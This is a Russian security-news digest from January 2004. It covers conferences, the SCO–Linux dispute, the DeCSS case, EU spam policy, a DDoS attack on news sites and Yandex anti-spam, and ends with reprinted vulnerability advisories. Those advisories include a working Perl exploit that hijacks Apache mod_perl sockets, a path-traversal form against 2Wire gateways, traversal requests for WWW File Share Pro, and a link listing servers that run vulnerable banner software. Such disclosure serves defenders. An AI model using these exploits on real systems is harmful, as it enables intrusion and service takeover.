Отправляет email-рассылки с помощью сервиса Sendsay
  Все выпуски  

15 новостей по информационной безопасности каждый день


Информационный Канал Subscribe.Ru


Новости информационной безопасности Стратег.Ру
Ekey.ru Удостоверяющий Центр"

23.1.2004 - 23.1.2004

Содержание


События, семинары, конференции, даты

2–4 февраля в Москве пройдет конференция "Электронный документооборот и ДОУ в госорганах".

23 января | e-rus

2–4 февраля в Москве пройдет конференция "Электронный документооборот и ДОУ в госорганах".

2–4 февраля в Москве пройдет 2-я всероссийская конференция "Электронный документооборот и документационное обеспечение управления в государственных органах".

Как отмечают организаторы, главная цель конференции заключается в распространении практического опыта, накопленного Советом Федерации и Государственной Думой, другими Федеральными органами власти, различными учреждениями Москвы и регионов России в области документационного обеспечения управления (ДОУ). На форуме будут обсуждаться проблемы, тенденции и перспективы внедрения, развития и взаимодействия различных систем автоматизации делопроизводства и электронного документооборота в контексте практической реализации федеральной целевой программы "Электронная Россия", включая вопросы нормативно-правового, методологического, программно-технического обеспечения и информационной безопасности.

Подробнее читайте на web-сайте оргкомитета конференции по адресу http://www.gdm.ru.

Итоги Московской Международной конференции WAAF

23 января | http://www.crime-research.ru/

21 января завершила работу 2-я Московская Международная конференция «Мировое сообщество против компьютерной преступности и кибертерроризма».

После открытия конференции и пленарных выступлений участников, работа конференции продолжалась по секциям.

Секция № 1 «Политика»:
1. Причины и истоки современного терроризма (политические, социальные, идеологические).
2. Существует ли терроризм как государственная политика.
3. Сепаратизм - экстремизм – терроризм - эволюция негативных тенденций.
4. Системность международного терроризма - мифы и реалии.
5. Влияние криминала на политику: пути и формы воздействия.


Секция № 2 «Современное право и международная организованная преступность»:
1.Демократия-безопасность-права человека - соотношение и противоречия.
2. Характеристика современной международной организованной преступности.
3.Унификация (гармонизация) законодательства – основа борьбы с терроризмом и преступностью.
4. Единая антитеррористическая терминология как необходимый элемент совместных действий.


Секция № 3 «Современные технологии»:
1.«Мутация» терроризма и уязвимость техногенного мира.
2.Терроризм и оружие массового поражения.
3. Киберпреступность - атаки из Зазеркалья.


Секция № 4 «Экономика»:
1. Экономические и финансовые объекты - мишени криминальных и террористических систем.
2. В каких «котлах» растворяются «грязные» деньги?
3. Возможен ли реальный финансовый контроль в интересах международной безопасности.
4. Финансирование терроризма.


Секция № 5 «Психология и СМИ»:
1. Как выиграть схватку в информационной и психологической войне с терроризмом и международной преступностью.
2. Информационная интоксикация общества насилием и ограничение свободы слова.
3. Возможна ли в обществе профилактика терроризма и преступности.


В работе Секции № 3 «Современные технологии» принял участие и выступил с докладом «Электронный терроризм – новый облик терроризма» директор Центра исследования компьютерной преступности Владимир Голубев.

По предложению председателя Международного антикриминального и антитеррористического комитета (МААК) в Украине, члена оргкомитета ВААФ, генерал-полковника Чистякова А.Н. Центр исследования компьютерной преступности (CCRC) вошел в состав международной общественной организации МААК.

Цели и задачи МААК во многом совпадают с целями и задачами CCRC, а именно:
- способствовать повышению уровня информированности общества об опасности и масштабам транснациональной преступности и международного терроризма, а также о необходимости адекватного реагирования на глобальные угрозы и вызовы со стороны международного криминала;
- содействовать всемирному развитию сотрудничества всех слоев общества в борьбе с международной преступностью и терроризмом для обеспечения эффективного отпора этим угрозам;
- способствовать совершенствованию национальной и международной правовой базы, направленной на повышение эффективности антикриминального и антитеррористического противодействия на национальном, региональном и мировом уровнях;
- способствовать информационной, научной, организационной и материально-технической поддержке всех субъектов, участвующих в программах и проектах по борьбе с транснациональной преступностью и терроризмом;
- содействие более глубокому пониманию условий и причин, порождающих международную преступность, поиску и пропаганде наиболее эффективных методов борьбы с ней;
- развитие существующих и создание новых универсальных методов, направленных на борьбу с преступностью и недопущение ее дальнейшей консолидации и роста влияния на глобальном, региональном и национальном уровнях;
- содействие развитию сотрудничества и налаживанию взаимодействия между профессионалами из правоохранительных органов разных стран;
- сближение позиций стран в области выработки основных подходов к решению проблем борьбы с организованной преступностью и терроризмом;
- подготовка рекомендаций по совершенствованию международно-правовой базы и гармонизации национального законодательства государств;
- оказание информационной, научной, организационной и материально-технической поддержки юридическим и физическим лицам, участвующим в программах и проектах, направленных на борьбу с транснациональной преступностью и терроризмом;
- реализация других перспективных замыслов и проектов, связанных с деятельностью Фонда.


С учетом достигнутой договоренности основные направления деятельности МААК будут расширены и дополнены в соответствии с основными направлениями деятельности Центра исследования компьютерной преступности, направленными на исследование компьютерной преступности и кибертерроризма

Участие в работе МААК Центра исследования компьютерной преступности, несомненно, будет способствовать лучшей информированности о состоянии и перспективах борьбы с транснациональной компьютерной преступностью и кибертерроризмом, совместному поиску наиболее эффективных мер борьбы с этим злом, а также оказанию научно-методической помощи правоохранительным органам.


Регулирование: Законы, постановления, сертификация, контроль

SCO лоббирует свои интересы в Конгрессе США

23 января | compulenta

Компания SCO, ведущая борьбу с корпорацией IBM и разработчиками свободного софта, отстаивает свою точку зрения на всех уровнях. 8 января генеральный директор SCO Дарл Макбрайд направил в Конгресс США прошение, в котором просит американских законодателей обеспечить разрешение противоречий в области разработки программного обеспечения. В этом документе Макбрайд всячески пытается убедить Конгресс в том, что открытое программное обеспечение и, в частности, Linux представляет серьезную угрозу для американского бизнеса и государства.

Вначале Макбрайд критикует лицензию GPL, которая подрывает привычные взгляды на разработку программ, делая программный код бесплатным и доступным для всех. Это, отмечается в прошении, подрывает софтверную индустрию, источником существования которой являются сборы от продажи и лицензирования программных продуктов. Не забыл глава SCO упомянуть и об использовании в Linux кода Unix и производных разработок.

По мнению главы SCO, открытое ПО несет в себе три основные угрозы. Во-первых, из-за своей бесплатности оно тормозит наметившийся рост в сфере ИТ и, тем самым, подрывает американскую экономику. Во-вторых, Макбрайда раздражает то, что зарубежные страны используют Linux, а его компания не получает за это ни копейки. SCO же считает, что все пользователи Linux должны выплачивать ей лицензионные отчисления, так как в этой открытой ОС якобы содержится код Unix, правами на который владеет SCO. Наконец, по мнению SCO, открытый софт несет в себе угрозу для национальной безопасности США. Используя Linux и кластеры из дешевых компьютеров, недруги США получают доступ к мощным вычислительным системам, которые они не смогли бы купить у американских компаний из-за экспортных ограничений.

Макбрайд в своем прошении также много говорит о необходимости защиты интеллектуальной собственности, о копирайтах и о противоречии лицензии GPL американским законам и конституции. Прошение снабжено также приложением, в котором SCO приводит ряд аргументов в доказательство своей правоты.

Закрыто дело в отношении распространителей программы DeCSS

23 января | ibusiness

Представили Ассоциации по контролю за копированием DVD-дисков (DVD CCA) обратились в Верховный суд Калифорнии с просьбой прекратить слушания в отношении нескольких десятков человек, обвинявшихся в распространении программы для взлома защиты DVD-дисков DeCSS. На этом дело, начатое еще четыре года назад, можно считать закрытым.

Столь ненавистная правообладателям утилита DeCSS, напомним, была написана норвежским подростком Йоном Йохансеном, который использовал приложение для просмотра DVD-фильмов на своем Linux-компьютере (других программных проигрывателей для открытой ОС в то время еще не было). Однако, кроме применения DeCSS в личных целях, Йохансен также выложил исходный код утилиты и подробное описание алгоритма шифрования DVD-дисков, CSS, в интернете. После этого программа очень быстро расползлась по Всемирной сети, и найти ее можно было даже на некоторых очень крупных сайтах. Более того, небольшая компания Copyleft начала выпуск трикотажных маек с размещенным на них кодом DeCSS. Естественно, подобное положение дел не могло оставить владельцев копирайта равнодушными. В результате, и автор утилиты DeCSS, и ее распространители оказались на скамье подсудимых: ответчикам вменялось нарушение американского Закона об авторских правах в цифровую эпоху (DMCA).

Впоследствии, впрочем, норвежский суд вынес Йохансену оправдательный приговор, постановив, что с легально приобретенными носителями пользователи могут делать все, что им заблагорассудится (доказательств применения DeCSS в пиратских целях не было). А на днях Ассоциация по контролю за копированием DVD-дисков отозвала свой иск против распространителей программы. Вероятно, шансы на выигрыш дела оказались настолько малы, что CCA решила не тратить понапрасну время и средства.

ЕС начинает кампанию против спама

23 января | webplanet

Комиссия ЕС в четверг выпустила программный документ, в котором говорится, что правительства Евросоюза должны ужесточить санкции против спама, чей объем сейчас составляет половину всего почтового трафика в интернете.

Евросоюз пробовал увильнуть от решения вопроса, введя запрет на нерелевантную электронную почту. Однако только законодательных мер для остановки спама недостаточно, говорится в плане действий Комиссии, полученном агентством Reuters. "Государства, входящие в союз, и компетентные власти должны … создать адекватные возможности для возмещения ущерба и предусмотреть реальные санкции, включая штрафы и уголовные наказания ", — сказано в документе, который будет обнародован на следующей неделе.

Группы защиты потребителей критикуют введенный в Великобритании закон против спама. Максимальный предусмотренный в нем штраф составляет лишь 5 000 фунтов (9 225 $). Эксперты считают, что этого недостаточно для устрашения. «Это выгодный бизнес. Некоторые спамеры делают 20 000 — 30 000 фунтов в неделю», — сказал недавно основатель Spamhaus Project Стив Линфорд (Steve Linford). В то же время сумма убытков из-за спама американского интернет-гигант службы AOL составляет почти семь миллионов долларов. По данным группы Spamhaus Project, которая борется против непрошенной почты, Британия в декабре вошла в десятку стран, в которых наиболее распространен спам.

Количество нерелевантных писем достигло угрожающих размеров. Из-за этого некоторые пользователи электронной почты или SMS могут просто отказаться от их использования, или будут воздерживаться от него, пока ситуация не изменится. Комиссия убеждает коммерсантов ввести кодекс поведения, который запретил бы определенные методы.

Известно, что большая часть спама приходит из-за границ ЕС. Комиссия предлагает странам-участницам союза объединить усилия в международном сотрудничестве, чтобы искоренить его источники. Филипп Уокер (Philippe Wacker), генеральный секретать European Multimedia Forum, полагает, что спамеры должны преследоваться по суду в тех странах, где они находятся. Единственный способ решить проблему — оказывать давление на страны, которые тоже заинтересованы в избавлении от отмывания денег и терроризма, говорит он. 


Проблемные ситуации, информационная преступность, сетевые войны

Хакеры осадили сайт izvestia.ru

23 января | http://www.crime-research.ru/

Во вторник, 20 января в 9.00 по минскому времени, неизвестные хакеры начали распределенную DoS-атаку (DDoS-атака) на информационный сайт www.charter97.org. За сутки до этого на нем была опубликована статья "Белорусские корни торговцев Child Porn", которая, видимо, и послужила причиной атаки. Вплоть до настоящего времени сайт выведен из строя и доступна одна страница, на которой читателей держат в курсе происходящего, а также приведена та самая статья.

Но такая ситуация не была единичной. На информационном портале izvestia.ru чуть раньше был опубликован материал на эту же тему. И 19 января на него началась атака. Принцип ее состоит в том, что злоумышленник ищет некоторое количество компьютеров, у которых в операционных системах присутствуют незакрытые уязвимости, и использует их в дальнейшем для организации нападения. Машины могут быть расположенны в разных точках мира. Именно с них производится "бомбардировка" конкретного сервера тысячами запросов. Администраторы портала установили, что общим для всех компьютеров, которые участвовали в атаке, является открытый 1900-й порт, на который посылается UDP-пакет с подменой IP-адреса отправителя внутри и URL атакуемого сервера. Таким образом, пользователи компьютеров даже не подозревали, что их машины участвуют в атаке.

Игорь Ворошилов, интернет-аналитик онлайновой редакции "Известий", так отзывается о прошедшей атаке: "Она продолжалась почти двое суток. Остановить такого типа DoS-атаку практически невозможно, поскольку автора UDP-запросов на компьютеры-посредники отследить очень сложно, да и вероятность того, что злодей именно со своей личной машины организует атаку, почти нулевая. Можно только защититься от нее каким-либо из способов, которые, в общем, тоже давно известны. Мы сумели прикрыть "тропу войны" через час с небольшим после начала налета. Наши программисты написали скрипт, который позволяет отследить те IP-адреса, количество запросов с которых было велико, и блокировать доступ к сайту именно для них. При этом остальные пользователи видят izvestia.ru как и прежде."

По его мнению, заказчиками атаки являются скорее всего те порнографы, которые еще находятся на свободе и продолжают свой "грязный бизнес". Однако кибернападение только усилило внимание общественности к затронутой теме. Истинные цели злоумышленников остаются в секрете. Так или иначе, работа сервера восстановлена. Игорь рассказал, что прецендентов такого масштаба у них еще не было. "Случались ситуации, когда с какого-нибудь одного IP-адреса криво настроенной "качалкой сайтов" сыпалось вдвое-втрое больше запросов, чем при штатной нагрузке, но такие неурядицы весьма просто локализуются и ликвидируются простой блокировкой IP выявленного нарушителя. А когда, как из пулемета, сыпятся сотни http-запросов почти с тысячи разбросанных по всему миру компьютеров, такая DoS-атака становится почти фатальной для незащищенного сайта, каковым является, например, www.charter97.org. Мы публично, через лист рассылки сообщества ezhe.ru поделились методикой защиты от конкретной DoS-атаки со всеми желющими. Однако тот факт, что атака на www.charter97.org все еще продолжается, свидетельствует лишь о пассивности саппорта виртуального хостинга, на котором размещается указанный сайт. А ведь для информационных интернет-ресурсов такая "война" опасна вдвойне, поскольку есть риск потерять аудиторию, восстановление лояльности читателей занимает времени и усилий на несколько порядков больше, чем требуется для отражения атаки".


Технологии безопасности. Организации разработчики, интеграторы.

«Яндекс» продолжает эксперименты со спамом

23 января | webplanet

На почтовом сервере «Яндекса» установлена вторая версия «Спамообороны», которая подсчитывает грамматические ошибки в тексте письма и начисляет штрафные баллы, как учитель в школе.

Новая версия «Спамообороны» (антиспамовая технология, разработанная в «Яндексе») тестировалась на протяжении двух месяцев. «В результате большой исследовательской работы были созданы самообучающиеся алгоритмы, — говорит Илья Сегалович, технический директор „Яндекса“. — Учитываются тысячи факторов, характеризующих спамовое письмо — признак массовости, особенности заголовков, словарный состав, маршрут доставки и др. И хотя полная победа над спамом — недостижимая цель, мы все же надеемся, что почтовый ящик пользователей серьезно „похудеет“ за счет качественной и точной очистки от спама.»

По предварительным оценкам, в результате внедрения второй версии «Спамооброны» доля писем, детектируемых как спам или рассылка, выросла с 40–45% до 60–65% (см. мониторинг почты). «Прошлой весной мы сформулировали идею чистой почты, понимая под этим почту без рекламы, без вирусов и без спама, — говорит Елена Колмановская, главный редактор Яндекса. — Две первые задачи успешно решены, а по борьбе со спамом за год мы заметно продвинулись вперед».

Характерной особенностью новой версии «Спамообороны» является проверка почты на предмет грамматических ошибок. Хорошо известно, что в конце прошлого года спамеры для обхода фильтров начали массово коверкать русский язык, доводя текст сообщения до ребуса. «Неграмотность» — один из анализируемых параметров «Спамообороны». Чем больше процент неправильных слов, тем больше штрафных очков получает письмо.

Впрочем, специалисты уверяют, что среднему неграмотному россиянину (на «Яндекс.Почте» зарегистрировано 3 млн пользователей) нечего бояться. Кроме грамматических ошибок, учитываются и другие признаки спама. Так что обычное неграмотное письмо будет успешно доставлено адресату, если в нем не предлагается изучить английский быстро и дешево.


Информационая безопасность бизнеса

SCO лоббирует свои интересы в Конгрессе США

23 января | compulenta

Компания SCO, ведущая борьбу с корпорацией IBM и разработчиками свободного софта, отстаивает свою точку зрения на всех уровнях. 8 января генеральный директор SCO Дарл Макбрайд направил в Конгресс США прошение, в котором просит американских законодателей обеспечить разрешение противоречий в области разработки программного обеспечения. В этом документе Макбрайд всячески пытается убедить Конгресс в том, что открытое программное обеспечение и, в частности, Linux представляет серьезную угрозу для американского бизнеса и государства.

Вначале Макбрайд критикует лицензию GPL, которая подрывает привычные взгляды на разработку программ, делая программный код бесплатным и доступным для всех. Это, отмечается в прошении, подрывает софтверную индустрию, источником существования которой являются сборы от продажи и лицензирования программных продуктов. Не забыл глава SCO упомянуть и об использовании в Linux кода Unix и производных разработок.

По мнению главы SCO, открытое ПО несет в себе три основные угрозы. Во-первых, из-за своей бесплатности оно тормозит наметившийся рост в сфере ИТ и, тем самым, подрывает американскую экономику. Во-вторых, Макбрайда раздражает то, что зарубежные страны используют Linux, а его компания не получает за это ни копейки. SCO же считает, что все пользователи Linux должны выплачивать ей лицензионные отчисления, так как в этой открытой ОС якобы содержится код Unix, правами на который владеет SCO. Наконец, по мнению SCO, открытый софт несет в себе угрозу для национальной безопасности США. Используя Linux и кластеры из дешевых компьютеров, недруги США получают доступ к мощным вычислительным системам, которые они не смогли бы купить у американских компаний из-за экспортных ограничений.

Макбрайд в своем прошении также много говорит о необходимости защиты интеллектуальной собственности, о копирайтах и о противоречии лицензии GPL американским законам и конституции. Прошение снабжено также приложением, в котором SCO приводит ряд аргументов в доказательство своей правоты.


Информационая безопасность государственной власти

Хакеры испытывают системы электронного голосования

23 января | http://www.crime-research.ru/

Если нанятые правительством Эстонии хакеры не смогут этой осенью взломать основанную на ID-карточках (электронных внутренних паспортах жителей Эстонии) систему электронного голосования, владельцы карточек смогут посредством Интернет голосовать на выборах в органы местного самоуправления уже в 2005 году.

Как пишет газета Eesti Pаevaleht, задание возложено на хакеров, компетентных в области криптографии. Если система выдержит их натиск, то она будет запущена уже на выборах в органы местного самоуправления в следующем году, что стало бы первым подобным случаем в мире. По словам советника конституционной комиссии парламента Эстонии Юлле Мадисе, теперь нужно будет пересмотреть принцип тайного голосования, поскольку никто не может контролировать происходящее у компьютера. По словам председателя Республиканской избирательной комиссии Эстонии Хейки Сибула, тайну голосования будет охранять возможность системы проголосовать снова, причем старый голос засчитан не будет. Электронный голос можно также погасить в день выборов путем обычного голосования.

А вот американская система Интернет-голосования оказалась ненадежной. В четверг (19 января) стало известно о недостатках, выявленных в американской системе голосования по Интернет. Как пишут две влиятельные газеты - «Нью-Йорк Таймс» и «Вашингтон Пост», эксперты по компьютерной безопасности, проверив американскую систему интернет-голосования, пришли к выводу, что она крайне ненадежна.

Программу, стоившую Пентагону 22 миллиона долларов, планировалось использовать уже на этих президентских выборах. Через Интернет должны были проголосовать шесть миллионов американцев, живущих за рубежом.

Однако эксперты рекомендуют немедленно отказаться от этой затеи. «Всемирная паутина», говорят они, наполнена опасными вирусами, интернет-червями и хакерами. Поэтому результаты могут быть легко фальсифицированы, и это подорвет доверие американцев не только к электронной, но и к реальной демократии.


Информационая безопасность общественной коммуникации, личности.

Dell сознался в браке

23 января | astera

Признать свои ошибки может только подлинный гранд рынка. Компания Dell сообщила, что сервера PowerEdge 1650, выпущенные с января по май прошлого года, бракованные. Проблемы до конца не выявлены, но пользователи не раз заявляли о возгораниях системных блоков. Dell свяжется со всеми своими покупателями и возместит финансовые потери.


Дыры и патчи программ и операционных сред

Определение инсталляционного пути в WebTrends Reporting Center

23 января | securitylab.ru

Программа: WebTrends Reporting Center 6.1а

Опасность: низкая

Наличие эксплоита: Да

Описание: Уязвимость обнаружена в WebTrends Reporting Center. Удаленный пользователь может определить инсталляционный путь.

Пример/Эксплоит:

http://[target]:1099/viewreport.pl?profileid=dontexist

http://www.oliverkarow.de/research/WT.jpg

URL производителя: http://www.webtrends.com

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Удаленный административный доступ в нескольких приложениях от DUware

23 января | securitylab.ru

Программа:

PROGRAM: DUWARE Products
HOMEPAGE: http://www.duware.com
VULNERABLE VERSIONS:
-------------------------------
Product : DUcalendar
Versions : 1.0, 1.1
-------------------------------
Product : DUclassified
Versions : 4.0, 4.1
-------------------------------
Product : DUdirectory
Version : 3.0
-------------------------------
Product : DUdownload
Version : 1.0
-------------------------------
Product : DUgallery
Versions : 3.0, 3.1, 3.2, 3.3
-------------------------------
Product : DUpics
Version : 3.0
-------------------------------
Product : DUportal
Version : 3.0
-------------------------------
Product : DUarticle
Version : 1.0
-------------------------------
Product : DUclassmate
Version : 1.0
-------------------------------
Product : DUpoll
Version : 3.0
-------------------------------
Product : DUnews
Version : 1.0
-------------------------------
Product : DUamazon
Version : 3.0
-------------------------------
Product : DUpaypal
Version : 3.0
-------------------------------
Product : DUfaq
Version : 1.0
-------------------------------
Product : DUforum
Version : 3.0
-------------------------------

Опасность: Выская

Наличие эксплоита: Да

Описание: Уязвимость обнаружена в нескольких приложениях от DUware. Удаленный пользователь может получить административный доступ к приложению.

Удаленный пользователь может напрямую запросить несколько сценариев, которые не требуют аутентификации, но выполняют административные функции.

URL производителя: http://www.duware.com

Решение:Установите соответвующее обновление.

Межсайтовый скриптинг в 2Wire Gateway

23 января | securitylab.ru

Программа: 2Wire Gateway

Опасность: Низкая

Наличие эксплоита: Да

Описание: Уязвимость обнаружена в 2Wire Gateway. Удаленный пользователь может выполнить XSS нападение против администратора.

<form name="wralogin" method="get"
action="http://<host>/wra/public/wralogin/?error=61&return=password/././.
/./boot.ini">
<input type="hidden" name="authcode" value="MUQmqC/sBiXfslfYEooIJg==">
<center>
<input type="password" name="password" value="">
<input type="submit" alt="Submit" width="58" height="19" border="0"></td>
</form>
</body>
</html>

URL производителя:www.2wire.com

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Раскрытие существование программы в Honeyd

23 января | securitylab.ru

Программа: Honeyd до версии 0.8

Опасность: Высокая

Наличие эксплоита: Да

Описание: Уязвимость обнаружена в Honeyd. Удаленный пользователь может определить существования программы на системе.

Программа отвечает на TCP пакеты с установленными SYN и RST флагами при выполнении NMAP fingerprints. В результате удаленный пользователь может определить существования программы на системе.

URL производителя: http://www.honeyd.org/release.php?version=0.8

Решение:Установите обновленную версию программы (0.8): http://www.citi.umich.edu/u/provos/honeyd/honeyd-0.8.tar.gz

Удаленное выполнение произволного кода в PHPix

23 января | securitylab.ru

Программа: PHPix Gallery 2.03 и более ранние версии

Опасность: Высокая

Наличие эксплоита: Нет

Описание: Уязвимость обнаружена в PHPix. Удаленный пользователь может выполнить произвольные команды на целевой системе.

Дополнительные подробности не раскрываются.

URL производителя: www.phpix.org

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Множественные уязвимости в WWW File Share Pro

23 января | securitylab.ru

Программа: WWW File Share Pro 2.42

Опасность: Высокая

Наличие эксплоита: Да

Описание: Несколько уязвимостей обнаружено в WWW File Share Pro. Удаленный авторизованный пользователь может перезаписать файлы на целевой системе. Удаленный пользователь может получить доступ к некоторым защищенным каталогам на целевой системе. Удаленный пользователь может аварийно завершить работу системы.

1. Загрузка произвольных файлов [CVE: CAN-2004-0059]:

Content-Disposition: form-data; name="file"; filename="./././file.txt"
Эксплоит: http://aluigi.altervista.org/poc/wfshare-up.txt

2. Удаленный пользователь может послать POST запрос с чрезмерно большим количеством данных, чтобы заставить систему исполбьзовать 100% CPU и потенциально аварийно завершить работу системы [CVE: CAN-2004-0060]. Пример:

http://aluigi.altervista.org/poc/webpostmem.zi p
http://aluigi.altervista.org/mytoolz/poststrike.zip
3. Доступ к защищенным каталогам [CVE: CAN-2004-0061]:
 
http://[target]/directory./
http://[ target]/\directory/
http://[target]///directory/
GET \directory/ HTTP/1.0 
 

URL производителя:http://www.wfshome.com

Решение:Установите обновленную версию программы (2.48)

Небезопасное создание временных файлов в SuSE Linux

23 января | securitylab.ru

Программа: SuSE 9.0

Опасность: Низкая

Наличие эксплоита: Да

Описание: Уязвимость обнаружена в нескольких сценариях, поставляемых с SuSE Linux. Локальный пользователь может получить поднятые привилегии на системе.

Следующие сценарии в SuSE Linux 9.0 небезопасно используют временные файлы:

/usr/X11R6/bin/fvwm-bug 
/usr/X11R6/bin/wm-oldmenu2new 
/usr/X11R6/bin/x11perfcomp 
/usr/X11R6/bin/xf86debug 
/opt/kde3/bin/winpopup-send.sh 
/sbin/lvmcreate_initrd
В результате локальный пользователь может выполнить нападение символьных ссылок, чтобы перезаписать произвольные файлы на системе.

URL производителя: http://www.suse.de

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Утечка файловых дескрипторов в Apache mod_perl

23 января | securitylab.ru

Программа: Apache mod_perl 1.99_09; Tested on Apache 2.0.47

Опасность: Низкая

Наличие эксплоита: Да

Описание: Уязвимость обнаружена в mod_perl для Apache web сервера. Локальный пользователь может внедриться в Apache http и https службы.

Обнаружена утечка критичкских файловых дескрипторов в mod_perl на Apache 2.0.x В результате локальный пользователь может создать Perl CGI приложение, которое возьмет под контроль уязвимые службы.

Пример/Эксплоит:

#!/usr/bin/perl
                                                                                
use POSIX qw(setsid);
                                                                                
if (!defined(my $pid = fork)) {
        print "Content-Type: text/html\n\n";
        print "cannot fork: $!";
        exit 1;
} elsif ($pid) { # This is the parent
        sleep(1);
        print "Content-Type: text/html\n\n";
        print "<html><body>Exploit installed</body></html>";
        system '/usr/sbin/httpd2 -k stop';
        sleep(2);
        exit 0;
 
                                                                                
# This is the Child
setsid;
sleep(2);
my $leak = 4;
open(Server, "+<&$leak");
while (1) {
        my $rin = '';
        vec($rin,fileno(Server),1) = 1;
        $nfound = select($rout = $rin, undef, undef, undef);
        if (accept(Client,Server) ) {
                print Client "HTTP/1.0 200 OK\n";
                print Client "Content-Length: 40\n";
                print Client "Content-Type: text/html\n\n";
                print Client "<html><body>";
                print Client "You're owned.";
                print Client "</body></html>";
                close Client;
        }

URL производителя:http://perl.apache.org

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Удаленное выполнение произвольного кода в системе показа баннеров TBE 5.0

23 января | securitylab.ru

Программа: TBE 5.0

Опасность: Критическая

Наличие эксплоита: Да

Описание: Уязвимость обнаружена в 'the banner exchange' (tbe). Удаленный авторизованный пользователь может выполнить произвольный код с привилегиями Web сервера.

Как сообщается, функция создания баннера не проверяет данные, представленные пользователь. Пользовательские данные помещаются в файл со следующим типом имени:

/bn/tbe-$user_id-$banner_id.html
Удаленный авторизованный пользователь может поместить произвольный код в этот файл (типа PHP), который будет выполнен с привилегиями Web сервера при просмотре этого баннера. Примеры работы:

http://vision.am/~stealth/tbe1.jpg
http://vision.am/~stealth/tbe2.jpg

URL производителя: http://www.native.ru/products/tbe/index.htm

Список серверов, использующих уязвимую программу, можно посмотерть тут:

http://www.native.ru/products/tbe/clients.htm

Решение: Способов устранения обнаруженной уязвимости не существует в настоящее время.




Инструменты управления содержанием Метод.ру
Дата создания документа: 16:32 23.01.04

http://subscribe.ru/
E-mail: ask@subscribe.ru
Отписаться
Убрать рекламу

В избранное